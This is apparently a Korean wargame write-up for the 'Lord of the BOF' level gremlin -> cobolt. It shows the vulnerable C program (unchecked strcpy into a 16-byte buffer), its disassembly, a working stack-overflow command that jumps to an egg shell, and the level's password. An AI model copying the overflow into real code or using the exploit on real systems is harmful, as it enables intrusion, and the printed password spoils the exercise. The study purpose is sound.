[LOB] gremlin -> cobolt
2019. 7. 28. 22:22ㆍWargame & CTF/LOB
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | /* The Lord of the BOF : The Fellowship of the BOF - cobolt - small buffer */ int main(int argc, char *argv[]) { char buffer[16]; if(argc < 2){ printf("argv error\n"); exit(0); } strcpy(buffer, argv[1]); printf("%s\n", buffer); } | cs |
gate에서 버퍼가 더 작아졌다.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 | 0x8048430 <main>: push %ebp 0x8048431 <main+1>: mov %ebp,%esp 0x8048433 <main+3>: sub %esp,16 0x8048436 <main+6>: cmp DWORD PTR [%ebp+8],1 0x804843a <main+10>: jg 0x8048453 <main+35> 0x804843c <main+12>: push 0x80484d0 0x8048441 <main+17>: call 0x8048350 <printf> 0x8048446 <main+22>: add %esp,4 0x8048449 <main+25>: push 0 0x804844b <main+27>: call 0x8048360 <exit> 0x8048450 <main+32>: add %esp,4 0x8048453 <main+35>: mov %eax,DWORD PTR [%ebp+12] 0x8048456 <main+38>: add %eax,4 0x8048459 <main+41>: mov %edx,DWORD PTR [%eax] 0x804845b <main+43>: push %edx 0x804845c <main+44>: lea %eax,[%ebp-16] // buffer 0x804845f <main+47>: push %eax 0x8048460 <main+48>: call 0x8048370 <strcpy> 0x8048465 <main+53>: add %esp,8 0x8048468 <main+56>: lea %eax,[%ebp-16] 0x804846b <main+59>: push %eax 0x804846c <main+60>: push 0x80484dc 0x8048471 <main+65>: call 0x8048350 <printf> 0x8048476 <main+70>: add %esp,8 0x8048479 <main+73>: leave 0x804847a <main+74>: ret | cs |
[BUFFER(16)][SFP(4)][RET(4)] 이므로 "A"*20+&SHELL 하면 쉘을 딸 수 있을것이다.
gate와 같이 에그쉘을 사용했다.
1 2 3 4 5 6 | [gremlin@localhost gremlin]$ ./cobolt `python -c 'print "A"*20+"\xa7\xfa\xff\xbf"'` AAAAAAAAAAAAAAAAAAAA§ bash$ my-pass euid = 502 hacking exposed | cs |
cobolt : hacking exposed
'Wargame & CTF > LOB' 카테고리의 다른 글
| [LOB] wolfman -> darkelf (0) | 2019.07.28 |
|---|---|
| [LOB] orc -> wolfman (0) | 2019.07.28 |
| [LOB] goblin -> orc (0) | 2019.07.28 |
| [LOB] cobolt -> goblin (0) | 2019.07.28 |
| [LOB] gate -> gremlin (0) | 2019.07.28 |